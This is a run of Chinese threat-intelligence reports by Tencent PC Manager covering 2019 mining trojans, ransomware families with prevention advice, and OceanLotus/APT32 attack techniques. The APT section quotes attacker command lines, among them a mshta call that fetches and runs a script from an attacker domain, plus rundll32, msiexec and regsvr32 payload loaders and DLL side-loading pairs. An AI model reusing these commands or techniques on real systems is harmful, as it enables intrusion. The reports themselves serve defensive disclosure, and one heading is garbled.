自2017年NSA武器泄漏以来,“永恒之蓝“漏洞被挖矿木马广泛利用。随着各大安全厂商对该漏洞进行修复和防御,该漏洞的影响正在逐渐减少。但是从数据上看,仍有约30%未安装“永恒之蓝“漏洞补丁,因此预计2020年有可能出现新的利用“永恒之蓝“漏洞的挖矿木马。

6.2 BlueKeep漏洞

2019年5月15日,微软发布了针对远程桌面服务(Remote Desktop Services ,以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708的修复程序,该漏洞影响Windows的Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP等多个版本。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码。 

2019年9月,我们注意到利用CVE-2019-0708漏洞的EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试可以实现远程代码执行;同时在2019年10月挖矿蠕虫DTLMiner在其攻击模块中也已经加入了CVE-2019-0708漏洞检测代码,因此我们推测在2020年极有可能出现利用该漏洞的新型挖矿木马。

6.3 僵尸腾讯电脑管家网络

MyKings、KingMiner、WannaMiner等挖矿僵尸网络在前期感染了大量机器,控制系统后通过计划任务、数据库存储过程、WMI等技术进行持久化攻击,因而可随时从服务器下载最新版本的恶意代码,很难被彻底清除。未来安全厂商与这些病毒团伙在的对抗还会持续。 

参考链接:

WannaCry蠕虫详细分析

https://www.freebuf.com/articles/system/134578.html

WannaMiner挖矿木马攻击事件通报

https://mp.weixin.qq.com/s/FEyaQ_AHn2TZPy-5FeMP7A

ZombieBoy木马分析

https://www.freebuf.com/column/157584.html

“VNC劫匪”攻击预警:中招企业遭遇GandCrab 5.2等多种病毒连环暴击

https://www.freebuf.com/column/198957.html

区块链火了Sality病毒,感染3万电脑伺机盗取比特币

https://www.freebuf.com/column/218404.html

针对SQL弱口令的爆破攻击再度袭来,KingMiner矿工已控制上万电脑

https://www.freebuf.com/column/221248.html

永恒之蓝木马下载器开创“无文件挖矿”新模式

https://www.freebuf.com/column/200241.html

GandCrab退出江湖 警惕继任者sodinokibi勒索病毒取而代之

https://www.freebuf.com/column/205215.html

BlueHero蠕虫再升级,新增震网3代武器库,看一眼就中招

https://www.freebuf.com/column/181604.html

蠕虫病毒bulehero再次利用“永恒之蓝”在企业内网攻击传播

https://www.freebuf.com/column/180544.html

BuleHero 4.0挖矿蠕虫真疯狂,超十种方法攻击企业网络

https://www.freebuf.com/column/219973.html

支持在深圳开展数字货币研究

https://finance.sina.com.cn/blockchain/coin/2019-08-19/doc-ihytcitn0105787.shtml

悄然崛起的挖矿机僵尸网络:打服务器挖价值百万门罗币

https://www.freebuf.com/articles/web/146393.html

“驱动人生”木马详细分析报告 2小时感染10万台电脑挖门罗币

https://www.freebuf.com/column/192015.html

一场精心策划的针对驱动人生公司的定向攻击活动分析

https://www.freebuf.com/articles/system/192194.html

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、概述 

勒索病毒作为全球最严峻的网络安全威胁之一,2019年持续对全球范围内的医疗、教育、能源、交通等社会基础服务设施,社会支柱产业造成重创。围绕目标优质化、攻击精准化、赎金定制化的勒索策略,以数据加密为核心,同时展开数据窃取、诈骗恐吓的勒索战术稳定成型,促使勒索病毒在2019年索取赎金的额度有明显增长。老的勒索家族持续活跃,新的勒索病毒层出不穷,犯罪行为愈演愈烈,安全形势不容乐观。

勒索病毒攻击2019典型事件:

2019年3月初,国内发现大量境外黑客组织借助恶意邮件传播的GandCrab勒索病毒,黑客通过假冒司法机构发件人,成功攻击感染了我国多个政企机构内网,随后我国多地区机构发起安全预警。

2019年3月下旬,世界最大的铝产品生产商之一挪威海德鲁公司(Norsk Hydro)遭遇勒索软件公司,随后该公司被迫关闭了几条自动化生产线,损失不可估量。

2019年5月26日,易到用车发布公告称其服务器遭受到连续攻击,服务器内核心数据被加密,攻击者索要巨额的比特币。易到表示严厉谴责该不法行为,并已报警。

2019年5月29日,美国佛罗里达州里维埃拉海滩警察局因员工运行了恶意的电子邮件,从而导致该城市基础服务设施遭受勒索软件加密。市政官员于随后召开会议,批准通过一笔大约60万美元的资金用于支付勒索赎金。

2019年6月中旬,世界最大飞机零件供应商之一ASCO遭遇勒索病毒攻击,由于被病毒攻击导致的生产环境系统瘫痪,该公司将1400名工人中大约1000人送回家带薪休假,同时停止了四个国家的工厂生产。

2019年9月22日,国内某大型建筑设计有限公司遭到勒索病毒攻击,被勒索的每台电脑要给出1.5个比特币才能解锁,该公司的电脑全面崩溃,所有图纸都无法外发,该事件引发微博热议。

2019年10月,全球最大的助听器制造商之一Demant遭受勒索病毒入侵,该公司是目前听力行业唯一产品线涵盖助听器、人工中耳、骨导助听器、电子耳蜗及调频语训系统的全面听力解决方案提供者,全球听力检测设备领域的领先者,攻击导致的造成的损失高达9500W美元。

2019年12月,Maze(迷宫)勒索团伙向Southwire集团勒索600W美元,Southwire是北美领先的电线电缆制造商之一,勒索团伙声称:如果Southwire不交赎金,则会在网络上公布该公司的泄漏的120G重要数据。

二、2019年勒索病毒特点总结:

1.老牌勒索家族转向精准化,高质量的狩猎行动

观察过去一年腾讯安全威胁情报中心收到的勒索求助反馈,主流老牌勒索家族(如GlobeImposter,Crysis)实施的勒索攻击中,企业用户占据了其绝大部分。这意味着老牌勒索家族已经从广撒网无差别模式的攻击,转变为精准化、高质量的行动,该转变使攻击者每次攻击行动后的收益转化过程更有效。而企业服务器被攻陷则多为对外开放相关服务使用弱口令导致,当企业内一台服务器被攻失陷,攻击者则会将该机器作为跳板机,继续尝试攻击其它局域网内的重要资产,在部分勒索感染现场我们也看到攻击者留下的大量相关对抗、扫描工具,个别失陷环境中攻击者光是使用的密码抓取工具就有数十款之多。

2.威胁公开机密数据成勒索攻击新手段

勒索病毒发展历程中,攻击者勒索的加密币种包括门罗币、达世币、比特币、平台代金券等。观察2019年相关数据可知,基于匿名性,稳定性,便捷性,相对保值性等特点,比特币已基本成为勒索市场中唯一不二的硬通货。付款方式上,基本使用虚拟货币钱包转账。勒索交涉的沟通过程中,使用IM工具私信的方式在大型攻击中已消失(少量恶搞、锁机类低赎金还在使用),攻击者多选择以匿名、非匿名邮箱沟通交涉,或使用Tor登录暗网,浏览器直接访问明网相应站点使用相应的赎金交涉服务。

2019年,勒索病毒团伙也开始偏向于赎金定制化,对不同目标要价各不相同,往往根据被加密数据的潜在价值定价(通常在5K-10w***),勒索病毒运营者的这种手法大幅提高了单笔勒索收益。这也导致个别大型政企机构在遭受到针对性的加密攻击后,被开出的勒索金额高达数百万元。当企业有完善的数据备份方案,拒绝缴纳赎金时,勒索团伙则采取另一种手段:威胁泄露受害者的机密文件来勒索。下图为Maze病毒团伙在数据加密勒索企业失败后,公开放出了被攻击企业2GB私密数据。

Sodinokibi勒索团伙也在黑客论坛发声,称如果被攻击者拒绝拒绝缴纳赎金,则会将其商业信息出售给其竞争对手。通过加密前先窃取企业重要数据,当企业拒绝交付解密赎金情况时,再以公开机密数据为筹码,对企业实施威胁勒索。数据泄露对大型企业而言,带来的损失可能更加严重,不仅会造成严重的经济损失,还会使企业形象受损,造成严重的负面影响。

3.僵尸网络与勒索病毒相互勾结

僵尸网络是一种通过多重传播手段,将大量主机感染bot程序,从而在控制者和感染僵尸网络程序之间所形成的一对多控制的网络,僵尸网络拥有丰富的资源(肉鸡),勒索病毒团伙与其合作可迅速提升其勒索规模,进而直接有效增加勒索收益。在2019年,国内借助僵尸网络实施的勒索攻击趋势也进一步提升,我们观察到主要有以下相互勾结。

A.Emotet僵尸网络伙同Ryuk实施勒索:

Ryuk勒索病毒家族起源于Hermes家族,最早的活跃迹象可追溯到2018年8月,国内自2019年7月开始有活动迹象,该团伙的特征之一为勒索赎金额度通常极高(超过百万),观察国内被勒索环境中可知,该染毒环境中同时会伴随着Emotet病毒的检出,而国外也有相关分析,指出该病毒常借助Trickbot,Emotet进行分发。

B.Phorpiex僵尸网络伙同Nemty实施勒索:

Nemty 病毒在国内早期主要依靠垃圾邮件传播,在2019年中也依靠Phorpiex僵尸网络大面积投递,下图中IP:185.176.27.132,腾讯安图情报平台中已标识为Phorpiex僵尸网络资产,其上投递了Nemty 1.6版本的勒索变种,此次病毒间的勾结行为导致在2019年国庆期间Nemty勒索病毒一度高发,国内多家企业受到Nemty勒索病毒影响。

C.Phorpiex僵尸网络伙同GandCrab实施的勒索:

GandCrab勒索病毒首次出现于2018年1月,也是2019上半年是最为活跃的病毒之一。该病毒在一年多的时间里经历了5个大版本的迭代,于2019年6月1日在社交媒体公开宣布已成功勒索20亿美元将停止运营,GandCrab勒索病毒的整个历程与使用Phorpiex僵尸网络长期投递有密不可分的关系。

D.Phorpiex僵尸网络群发勒索恐吓邮件:

你可能收到过类似的邮件:“你已经感染了我的私人木马,我知道你的所有密码和隐私信息(包括隐私视频),唯一让我停下来的方式就是三天内向我支付价值900美元的比特币。”Phorpiex僵尸网络利用网络中的历史泄漏邮箱信息,对千万级别的邮箱发起了诈骗勒索,当命中收件人隐私信息后,利用收件人的恐慌心里,进而成功实施欺诈勒索。勒索过程中,受害者由于担心自己隐私信息遭受进一步的泄漏,极容易陷入勒索者的圈套,从而受骗缴纳赎金。

4.丧心病狂的反复加密,文件名加密

腾讯安全御见威胁情报中心在日常处理勒索病毒的现场发现,有个别系统内同时被多个勒索病毒感染。后来的攻击者在面对文件已被加密的失陷系统,依然将已损坏数据再次加密。导致受害者需缴纳两次赎金,且由于解密测试过程无法单一验证,即使缴纳赎金,数据还原难度也有所提高。同时还注意到部分勒索病毒并不满足于加密文件,连同文件名也一同进行修改,从侧面反映出勒索病毒运营者也存在竞争激烈,攻击者对赎金的追求已丧心病狂。

5.中文定制化

中国作为拥有8亿多网民的网络应用大国,毫无疑问成为勒索病毒攻击的重要目标,一部分勒索病毒运营者开始在勒索信、暗网服务页面提供中文语言界面。

三、2019年勒索病毒攻击数据盘点

2019全年中,勒索病毒攻击以1月份攻击次数最多,下半年整体攻击次数较上半年有所下降。但根据腾讯安全威胁情报中心接收到的众多反馈数据,下半年企业遭受勒索病毒攻击的反馈数不减反增,主要原因为部分老牌勒索家族对企业网络的攻击更加精准,致企业遭遇勒索病毒的损失更加严重。

从2019我们接受到的勒索反馈来看,通过加密用户系统内的重要资料文档,数据,再勒索虚拟币实施犯罪仍为当前勒索病毒攻击的的主要形式。使用群发勒索恐吓邮件,命中收件人隐私信息后,再利用收件人的恐慌心里,实施欺诈勒索的方式也较为流行。加密数据勒索不成以泄漏数据再次胁迫企业的方式也成为了勒索团伙新的盈利模式(Maze和Sodinokibi已使用)。以锁定系统的方式进行勒索多以易语言为代表编写的游戏外挂、辅助工具中。同时也有极少数以勒索攻击为表象,以消除入侵痕迹掩盖真相为目的的攻击事件,该类型的勒索病毒通常出现在部分定向窃密行动中。

观察2019全年勒索病毒感染地域数据可知,国内遭受勒索病毒攻击中,广东,北京,江苏,上海,河北,山东最为严重,其它省份也有遭受到不同程度攻击。传统企业,教育,政府机构遭受攻击最为严重,互联网,医疗,金融,能源紧随其后。

2019全年勒索病毒攻击方式依然以弱口令爆破为主,其次为通过海量的垃圾邮件传播,勾结僵尸网络发起的攻击有上升趋势。勒索病毒也通过高危漏洞,软件供应链形等形式传播。

四、2019国内勒索家族活跃Top榜

观察2019全年勒索病毒活跃度,GlobeImposter家族最为活跃,该病毒在国内传播主要以其12生肖系列,12主神系列为主(加密扩展后缀中包含相关英文,例如:.Zeus865),各政企机构都是其重点攻击目标。其次为Crysis系列家族,该家族伙同其衍生Phobos系列一同持续活跃,紧随GlobeImposter之后。GandCrab家族虽然在2019年6月1日宣布停止运营,但在之后短时间内依然有部分余毒扩散,该病毒以出道16个月,非法获利20亿美元结束传播,虽然其2019生命周期只有一半,但其疯狂敛财程度堪称年度之最。紧随其后的则是被称为GandCrab接班人的Sodinokibi,该病毒在传播手法,作案方式,病毒行为上于GandCrab有许多相似,为2019年勒索病毒中最具威胁的新型家族之一。Stop家族则寄生于大量的破解软件中,持续攻击加密了国内大量技术人员的工程制图,音频,视频制作材料。老牌勒索家族持续活跃,新的勒索病毒不断涌现。越来越多的不法分子参与到这个黑产行业中来。

GlobeImposter 

GlobeImposter出现于2017年中,加密文件完成后会留下名为HOW TO BACK YOURFILES.(txt html exe)类型的勒索说明文件。该病毒加密扩展后缀繁多,其规模使用且感染泛滥的类型有12生肖4444,12生肖/主神666,12生肖/主神865,12生肖/主神865qq等系列,由于该病毒出现至今仍然无有效的解密工具,各政企机构需提高警惕。

Crysis

Crysis勒索病毒从2016年开始具有勒索活动 ,加密文件完成后通常会添加“ID+邮箱+指定后缀”格式的扩展后缀,例:“id-编号.[[email protected]].bip”,其家族衍生Phobos系列变种在今年2月开始也有所活跃。该病毒通常使用弱口令爆破的方式入侵企业服务器,安全意识薄弱的企业由于多台机器使用同一弱密码,面对该病毒极容易引起企业内服务器的大面积感染,进而造成业务系统瘫痪。

GandCrab

GandCrab勒索病毒首次出现于2018年1月,是国内首个使用达世币(DASH)作为赎金的勒索病毒,也是2019上半年是最为活跃的病毒之一。该病毒在一年多的时间里经历了5个大版本的迭代,该病毒作者也一直和安全厂商、执法部门斗智斗勇。该病毒在国内擅长使用弱口令爆破,挂马,垃圾邮件等各种方式传播。

2018年10月16日,一位叙利亚用户在推特表示,GandCrab病毒加密了他的电脑文件,因无力支付勒索赎金,他再也无法看到因为战争丧生的小儿子的照片。随后GandCrab放出了叙利亚地区的部分密钥,并在之后的病毒版本中将叙利亚地区列入白名单不再感染,这也是国内有厂商将其命名为“侠盗勒索”的原因。

2019年6月1日,GandCrab运营团队在某俄语论坛公开声明“从出道到现在的16个月内共赚到20多亿美金,平均每人每年入账1.5亿,并成功将这些钱洗白。同时宣布关闭勒索服务,停止运营团队,后续也不会放出用于解密的密钥,往后余生,要挥金如土,风流快活去”。

2019年6月17日,Bitdefender联合罗马尼亚与欧洲多地区警方一起通过线上线下联合打击的方式,实现了对GandCrab最新病毒版本v5.2的解密。该事件也标志着GandCrab勒索团伙故事的终结。

Sodinokibi

Sodinokibi勒索病毒首次出现于2019年4月底,由于之后GandCrab停止运营事件,该病毒紧跟其后将GandCrab勒索家族的多个传播渠道纳入自身手中。该病毒目前在国内主要通过web相关漏洞和海量的钓鱼邮件传播,也被国内厂商称为GandCrab的“接班人”,从该病毒传播感染势头来看,毫无疑问是勒索黑产中的一颗上升的新星。

Stop

Stop勒索病毒家族在国内主要通过破解软件等工具捆绑进行传播,加密时通常需要下载其它病毒辅助工作模块。Stop勒索病毒使用勒索后缀变化极为频繁,通常勒索980美元,并声称72小时内联系病毒作者将获得50%费用减免,同时,该病毒除加密文件外,还具备以下行为特点。

1.加密时,禁用任务管理器、禁用Windows Defender、关闭Windows Defender的实时监控功能;

2.通过修改hosts文件阻止系统访问全球范围内大量安全厂商的网站;

3.因病毒执行加密时,会造成系统明显卡顿,为掩人耳目,病毒会弹出伪造的Windows 自动更新窗口;

4.释放一个被人为修改后不显示界面的TeamViewer模块,用来实现对目标电脑的远程控制;

5..下载AZORult窃密木马,以窃取用户浏览器、邮箱、多个聊天工具的用户名密码;

Paradise

Paradise勒索病毒最早出现于2018年7月,该病毒勒索弹窗样式与Crysis极为相似,勒索病毒加密文件完成后将修改文件名为以下格式:[原文件名]_[随机字符串]_{邮箱}.随机后缀,并留下名为Instructions with your files.txt或###_INFO_you_FILE_###.txt 的勒索说明文档。

Maze

Maze(迷宫)勒索病毒也叫ChaCha勒索病毒,擅长使用Fallout EK漏洞利用工具通过网页挂马等方式传播。被挂马的网页,多见于黄赌毒相关页面,通常会逐步扩大到盗版软件、游戏外挂(或破解)、盗版影视作品下载,以及某些软件内嵌的广告页面,该病毒的特点之一是称根据染毒机器的价值来确认勒索所需的具体金额,该勒索病毒同时也是将数据加密勒索转向数据泄露的先行者。

Nemty

NEMTY勒索病毒出现于今年8月,该病毒早期版本加密文件完成后会添加NEMTY扩展后缀,也因此得名。NEMTY 变种病毒加密文件完成后会添加“._NEMTY_random_7个随机字符”扩展名后缀,由于该病毒与Phorpiex僵尸网络合作,在2019年国庆期间感染量有一次爆发增长,该病毒会避开感染俄罗斯、白俄罗斯、乌克兰及多个中亚国家。

Medusalocker

Medusalocker该病毒出现于2019年10月,已知该病毒主要通过钓鱼欺诈邮件及托口令爆破传播。该病毒早期版本加密文件完成后添加扩展后缀.encrypted,最新传播病毒版本加密文件后添加.ReadTheInstructions扩展后缀。攻击者会向受害者勒索1BTC(比特币),市值约6.5万元。

Ryuk

Ryuk的特点之一是倾向于攻击数据价值较高的政企机构,且赎金普遍极高(最近联系作者要价11个比特币,价值约75万元RMB,在国外该病毒开出的赎金额度通常高达数百万RMB),Ryuk勒索家族起源于Hermes家族,最早的活跃迹象可追溯到2018年8月,国内发现该病毒的投递与Emotet僵尸网络有着密不可分的关系。

五、勒索病毒未来发展方向

1、勒索病毒与安全软件的对抗加剧

随着安全软件对勒索病毒的解决方案成熟完善,勒索病毒更加难以成功入侵用户电脑,病毒传播者会不断升级对抗技术方案。

2、勒索病毒传播场景多样化

过去勒索病毒传播主要以钓鱼邮件为主,现在勒索病毒更多利用了高危漏洞、鱼叉式攻击,或水坑攻击等方式传播,乃至通过软件供应量传播,都大大提高了入侵成功率。

3、勒索病毒攻击目标转向企业用户

个人电脑大多能够使用安全软件完成漏洞修补,在遭遇勒索病毒攻击时,个人用户往往会放弃数据,恢复系统。而企业用户在没有及时备份的情况下,会倾向于支付赎金,挽回数据。因此,已发现越来越多攻击目标是政府机关、企业、医院、学校。

4、勒索病毒更新迭代加快

随着安全厂商与警方的不断努力,越来越多的勒索病毒将会被破解,被打击,这也将加剧黑产从业者对病毒进行更新迭代。

5、勒索赎金定制化,赎金进一步提高

随着用户安全意识提高、安全软件防御能力提升,勒索病毒入侵成本越来越高,攻击者更偏向于向不同企业开出不同价格的勒索赎金,定制化的赎金方案能有效提升勒索成功率,直接提升勒索收益。如某公司被勒索病毒入侵后,竟被勒索9.5个比特币,还有Ryuk团伙动辄开出上百万的勒索赎金单,都代表勒索病毒赎金未来会有进一步的提高。

6、勒索病毒开发门槛降低

观察近期勒索病毒开发语言类型可知,越来越多基于脚本语言开发出的勒索病毒开始涌现,甚至开始出现使用中文编程“易语言”开发的勒索病毒。例如使用Python系列的“Py-Locker”勒索病毒,易语言供应链传播闹的沸沸扬扬的“unname1889”勒索病毒,甚至利用bat脚本结合Winrar相关模块直接对文件进行压缩包密码加密的“FakeGlobeimposter”病毒等,门槛低意味着将有更多的黑产人群进入勒索产业这个领域,也意味着该病毒将持续发展泛滥。

7、勒索病毒产业化

随着勒索病毒的不断涌现,腾讯安全御见威胁情报中心观察到勒索代理同样繁荣。当企业遭遇勒索病毒攻击,关键业务数据被加密,而理论上根本无法解密时,勒索代理机构,承接了受害者和攻击者之间谈判交易恢复数据的业务。我们注意到勒索代理机构常年购买搜索关键字广告承接生意。

8、勒索病毒多平台扩散

目前受到的勒索病毒攻击主要是windows系统,但是管家也陆续发现了MacOS、Android等平台的勒索病毒,随着windows的防范措施完善和攻击者永不满足的贪欲,未来勒索病毒在其他平台的影响力也会逐步增大。

9、勒索病毒黑产参与者持续上升,勒索病毒影响规模进一步扩大

GandCrab通过16个月赚够20亿美金高调“退休”的故事被广为流传,可以预见,此事件将引爆黑暗中更多人的贪欲,在未来相当长一段时间内,将会有越来越多的人投身勒索行业,黑产从业者将持续上升。随着各类型病毒木马盈利模式一致,各类型病毒均有可能随时附加勒索属性。蠕虫,感染,僵尸网络,挖矿木马,在充分榨干感染目标剩余价值后,都极有可能下发勒索模块进行最后一步敲诈,2019年老的勒索家族持续活跃,新的勒索病毒也层出不穷,可预测未来由勒索病毒导致的网络攻击将依然是企业安全面临的重要问题之一。

六、勒索病毒防范措施

企业用户参考以下措施

A、定期进行安全培训,日常安全管理可参考“三不三要”思路

1.不上钩:标题吸引人的未知邮件不要点开

2.不打开:不随便打开电子邮件附件

3.不点击:不随意点击电子邮件中附带网址

4.要备份:重要资料要备份

5.要确认:开启电子邮件前确认发件人可信

6.要更新:系统补丁/安全软件病毒库保持实时更新

B、全网安装专业的终端安全管理软件,由管理员批量杀毒和安装补丁,后续定期更新各类系统高危补丁。

C、部署流量监控/阻断类设备/软件,便于事前发现,事中阻断和事后回溯。

D、建议由于其他原因不能及时安装补丁的系统,考虑在网络边界、路由器、防火墙上设置严格的访问控制策略,以保证网络的动态安全。

E、使用内网强制密码安全策略来避免使用简单密码。

1.建议对于存在弱口令或是空口令的服务,在一些关键服务上,应加强口令强度,同时需使用加密传输方式,对于一些可关闭的服务来说,建议关闭不要的服务端口以达到安全目的。不使用相同口令管理多台关键服务器。

2.建议对数据库账户密码策略建议进行配置,对最大错误登录次数、超过有效次数进行锁定、密码有效期、到期后的宽限时间、密码重用等策略进行加固设置。

F、建议网络管理员、系统管理员、安全管理员关注安全信息、安全动态及最新的严重漏洞,攻与防的循环,伴随每个主流操作系统、应用服务的生命周期。

G、建议对数据库的管理访问节点地址进行严格限制,只允许特定管理主机IP进行远程登录数据库。

H、做好安全灾备方案,可按数据备份三二一原则来指导实施

1、至少准备三份:重要数据备份两份

2、两种不同形式:将数据备份在两种不同的存储类型,如服务器/移动硬盘/云端/光盘等

3、一份异地备份:至少一份备份存储在异地,当发生意外时保证有一份备份数据安全。

个人用户启用安全防护软件

腾讯电脑管家可对各勒索病毒家族变种及时防御拦截,同时管家文档守护者通过集成多个主流勒索家族的解密方案,通过完善的数据备份防护方案,在2019中为数千万的管家用户提供文档保护恢复服务。通过自研解密方案成功为上千名不幸感染勒索病毒者提供了解密服务,帮助其成功恢复了被病毒加密的文件。

利用电脑管家内置文档守护者尝试恢复数据

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、概述

“海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国大陆的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动最活跃的APT攻击组织,甚至没有之一。

腾讯安全御见威胁情报中心曾在2019年上半年发布过海莲花组织2019年第一季度攻击活动报告,在报告发布之后一直到现在,我们监测到该组织针对中国大陆的攻击持续活跃。该组织的攻击目标众多且广泛,包括中国大陆的政府部门、海事机构、外交机构、大型国企、科研机构以及部分重要的私营企业等。并且我们监测到,有大量的国内目标被该组织攻击而整个内网都沦陷,且有大量的机密资料、企业服务器配置信息等被打包窃取。

此外我们发现,该组织攻击人员非常熟悉我国,对我国的时事、新闻热点、政府结构等都非常熟悉,如刚出个税改革时候,就立马使用个税改革方案做为攻击诱饵主题。此外钓鱼主题还包括绩效、薪酬、工作报告、总结报告等。

而从攻击的手法上看,相对第一季度变化不是太大,但有一些小的改进,包括攻击诱饵的种类、payload加载、绕过安全检测等方面。而从整体攻击方式来看,依然采用电子邮件投递诱饵的方式,一旦获得一台机器的控制权后,立即对整个内网进行扫描和平移渗透攻击等。这也进一步说明了APT攻击活动不会因为被曝光而停止或者有所减弱,只要攻击目标存在价值,攻击会越来越猛烈,对抗也会越来越激烈。

有关海莲花APT组织2019年对中国大陆攻击情况的完整技术报告,请参考:

https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf

二、攻击特点

2.1 钓鱼邮件的迷惑性

海莲花组织擅长使用鱼叉攻击,通过大量精准发送钓鱼邮件来投递恶意附件的方式进行攻击。整个2019年,持续对多个目标不断的进行攻击,如下列钓鱼邮件:

从邮件主题来看,大部分邮件主题都非常本土化,以及贴近时事热点。邮件主题包括:

《定-关于报送2019年度经营业绩考核目标建议材料的报告》、《组织部干部四处最新通知更新》、《关于2019下半年增加工资实施方案的请示(待审)》、《2019年工作报告提纲2(第四稿)》、《2019年5月标准干部培训课程通知》等等。

我们在2019年第一季度的报告中还提到海莲花组织采用敏感内容主题钓鱼邮件,不过在之后的攻击中并未再次发现使用该类型诱饵:

此外,投递钓鱼邮件的账号均为网易邮箱,包括126邮箱和163邮箱,账号样式为:名字拼音+数字@163(126).com,如:

Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。

2.2 诱饵类型的多样化

海莲花组织所使用的诱饵类型众多,能想到的诱饵类型海莲花几乎都用过。除了我们在第一季度报告里提到的白加黑、lnk、doc文档、WinRAR ACE漏洞(CVE-2018-20250)的压缩包等类型外,之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。

可执行文件诱饵:

Chm诱饵:

白加黑诱饵:

带有宏的恶意office文档:

恶意lnk:

带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包:

2.3 载荷执行方式多变

由于诱饵的多样化,载荷执行的方式也多变。此外第二阶段的加载方式同样方式众多。

1、直接执行可执行文件

如该诱饵,伪装为word图标的可执行文件,并在文件描述里修改成了Microsoft DOCX,用于迷糊被钓鱼者。执行恶意文件后,会释放诱饵文档2019年5月标准干部培训课程通知.docx,并且打开,让受害者以为打开的就是word文档。而打开后的文档为模糊处理的文档,诱使受害者启用文档中的宏代码以查看文档内容,实际上启用宏之后,仍然看不到正常的内容:

2、使用rundll32加载恶意dll

如某诱饵在执行后,会在C:\Users\Administrator\AppData\Local\Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll,然后使用rundll32来执行该dll:”C:\Windows\system32\rundll32.exe”"C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register

3、宏

使用宏来执行载荷,且宏代码经过的混淆处理:

4、Office内存执行恶意shellcode

使用宏代码,在office中直接解密shellcode,在内存中创建线程执行:

5、dll侧加载(白加黑)

使用dll侧加载(DLL Side-Loading)技术来执行载荷,通俗的讲就是我们常说的白加黑执行。

其中所使用的宿主文件对包括:

白文件原名 黑dll文件名
iTunesHelper.exe AppVersions.dll
SGTool.exe Inetmib1.dll
Rar.exe ldvptask.ocx
GoogleUpdate.exe goopdate.dll
360se.exe chrome_elf.dll
Winword.exe wwlib.dll
rekeywiz.exe mpr.dll
wps.exe krpt.dll
wechat.exe WeChatWin.dll

6、通过com技术执行

通过com技术,把某恶意dll注册为系统组建来执行:

7、Chm内嵌脚本

Chm执行后,会提示执行ActiveX代码:

其脚本内容为:

不过由于编码处理的问题,该chm打开后为乱码:

而通过手动解压后,原始内容如下:

8、使用计划任务进行持久性攻击

如上面的chm诱饵执行后,会在%AppData%\Roaming下释放文件bcdsrv.dll,然后创建名为MonthlyMaintenance的计划任务:

命令行为:C:\Windows\System32\msiexec.exe -YC:\Users\Administrator\AppData\Roaming\bcdsrv.dll

bcdsrv.dll为真正的恶意文件。

9、lnk调用mstha执行

该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》:

执行lnk后,会调用命令:C:\Windows\SysWOW64\mshta.exehttp://api.baidu-json.com/feed/news.html,而news.html实际为一个vbs脚本文件。

10、使用odbcconf.exe加载文件:

odbcconf.exe为系统自带的一个文件,该文件可以用来执行dll文件,而由于宿主进程为系统文件,因此可以逃避一些安全软件的拦截:

11、WinRAR ACE(CVE-2018-20250)漏洞

带有该漏洞的压缩包,可以构造为:解压后除了会解压出正常的文件外,再在启动目录(C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup)释放一个自解压文件:

该文件为一个自解压程序,等启动后,会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后执行命令regsv*** /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行:

2.4 多重载荷攻击

我们在最新的攻击活动中,我们首次发现海莲花使用了多重载荷的攻击。

之前的攻击活动中,都是解密shellcode后,就直接执行最终的RAT,如:

而在最新的攻击活动中,我们发现,解密shellcode后,会先下载shellcode执行,如果下载不成功,再来加载预先设定好的RAT:

这样使得攻击活动更加的丰富和多样性,并且也可控。

2.5 与安全软件对抗激烈

海莲花也采用了多种对抗安全软件的方式,主要为:

1、dll的侧加载(白加黑)

该技术上面已详细描述,这里不再赘述。

2、使用系统文件来执行:如odbcconf.exe

3、Office中直接内存执行shellcode

上文也已经描述,这里也不再展开。

4、添加垃圾数据以扩充文件大小

为了防止该文件被安全厂商收集,海莲花组织特意在某些文件的资源中添加大量的垃圾数据的方式以扩充文件大小。

如某文件,填充垃圾数据后,文件大小高达61.4 MB (64,480,256 字节):

5、每台机器的第二阶段后门都是定制的

每台机器的第二阶段后门文件都是根据当前机器的机器属性(如机器名)来加密定制的,因此每台机器上的文件hash都是不一样,且没这台机器的相关信息则无法解密。因此且即便被安全厂商捕捉,只要没有这台机器的相关遥感数据就无法解密出真正的payload。详细的见后文的”定制化后门”部分。

6、通信的伪装

如某次攻击中C2的伪装:根据配置信息,可进行不同的连接和伪装,对C2进行拼装后再进行解析。拼接方式为(xxx为配置C2):

{rand}.xxx

www6.xxx

cdn.xxx

api.xxx

HTTPHeader的伪装:

2.6 定制化的后门

使用定制化的后门(主要是第二阶段下发的后门),海莲花组织在2019年所使用的技术中最令人印象深刻的。该技术我们曾经在《2019年海莲花第一季度攻击报告》中首次曝光:针对每台机器下发的恶意文件,都使用被下发机器的相关机器属性(如机器名)进行加密,而执行则需要该部分信息,否则无法解密。因此每个下发的恶意文件都不一样,而且即便被安全厂商捕捉,只要没有该机器的相关遥感数据就无法解密出真正的payload。

该后门最终使用白加黑的方式来执行,包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、XGFileCheck.exe+ goopdate.dll、SogouCloud.exe+inetmib1.dll等组合来执行。

加密流程为:

可以看到,某次针对国家某单位的攻击中,使用的密钥为:

而该受害的用户名为Cao**,可见该木马只专门为了感染该电脑而特意生成的。

2.7 多种恶意软件的选择

从我们的长期跟踪结果来看,海莲花组织使用最终的恶意软件(无论是第一阶段后门还是第二阶段后门)主要有三种,分别是CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。其中CobaltStrike和Denis使用的最多,而修改版的Gh0st则比较少见。

CobaltStrike:

Denis:
